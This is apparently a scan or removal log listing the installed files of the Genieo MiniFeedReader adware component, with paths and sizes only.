C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\facebook_twitter.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\welcome_home.gif (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dialogWarning.png (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\core.html (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\google_search_input_logo.png (903 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\follow_twitter_btn.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\message_note.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weatherimg.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_ru.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\trayapp_uninstall.exe (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ru.css (630 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\ok.png (769 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\x_small.png (832 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\css\main.css (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-severe-alert.png (977 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\birthday.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\white.gif (965 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\social_baloon_tip.png (158 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowv.png (939 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extNextButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-snow.png (998 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\class.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\syncOnButton.png (566 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\body_bg.png (323 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_controls.png (814 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.json (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\UIState.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\redirect_handler.html (796 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\counter_bg.png (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShareDisabled.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\js\collage.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\counter_bg.png (270 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\big_video_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame3.png (587 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\redSq.png (136 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white.png (217 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-storm.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\css\partner.css (930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\splash_video.jpg (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\notify.css (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hotItemIcon.jpg (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\ajax-loader.gif (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\default.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\orig\field_ru.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo_small.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray_transparent.png (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon.png (432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\blockTopic.png (137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\shekerKolshehu.gif (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowh.png (944 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow_old.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers-scattered.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reportBugButton.png (777 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\button-enable.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\css\main.css (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_image_frame.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon12px.png (543 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.gif (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\googleimg.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\background.png (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\settings_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow.png (206 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\headlines_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_auth_start.png (440 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac2.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\message_tip.png (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers.png (959 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_9.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton2.png (704 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\main.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\double_border.png (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\general.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_btn.png (309 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\aggregation_page.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\anabel_analytics.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_no_birthdays_bg.png (883 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tryItNow.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-list.txt (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-nodebug.js (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cakes.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.cookie.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\magazine_ribon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\test_items.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\hp_guard.html (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_word.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.classpath (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\startpage.css (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac2.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\startpage.tpl (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\parent_proxy.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\utils.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\ticker.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fail.png (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMacEnableExts.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton2.png (997 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\aggregation_page.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fbButton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\index.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon12px.png (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\anabel_settings.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_collapse.png (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\blank.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.properties (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\userpic_overlay.png (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicBg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.json (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3rightButton.png (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebookShareIcon.png (311 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\btn.png (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\photos.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\const.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pnf.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iPhoneOk.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\goRssButton.png (790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_btn.png (249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\followbutton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicDefault.png (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon.png (798 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\normalLevel.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\empty.gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template3.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prowered_by_google.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_7.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DebugUtils.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\close.png (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_bg.gif (834 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\disconnectTwitterBtn.png (690 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery-genieo-postmessage.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg_white.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShare.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin2.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\you_tube.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow_down.png (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5sm.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reopen_btn.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\activity-indicator.gif (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waitingTr.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\defaultCover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\layers.css (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\share_btn.png (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_video_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hover_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\personalizationMeter.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fb_icon_big.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\follow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui_pages.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iphone.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\set_as_homepage_bg.png (993 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fb.gif (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_favicon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tutorial.png (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\strip.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waiting.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_2.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\settings.css (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\actions.png (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\menu_bg.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\translator.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\red_arror_down.png (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4sm.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\warning.png (380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\videobutton.png (862 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_white.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\feedbackButton.png (851 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x_white.gif (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_fr.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3leftButton.png (687 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\redarr.png (484 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_sep.gif (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\forPictures.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\layers.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-debug.js (534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2sm.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\wt.png (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down_disable.gif (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\open_splash.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\poweredByGenieo.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton2.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\shortcut.png (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear.png (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\item_controls_bg.png (167 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\connect_with_facebook.png (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\classes.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\easer.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev2.gif (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\social_box.png (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\notification_controls.png (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\tpl\main.tpl (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\underconstructions.jpg (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10sm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\loader.gif (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\redArrow.png (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\sad.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\play_icon.png (7 bytes)
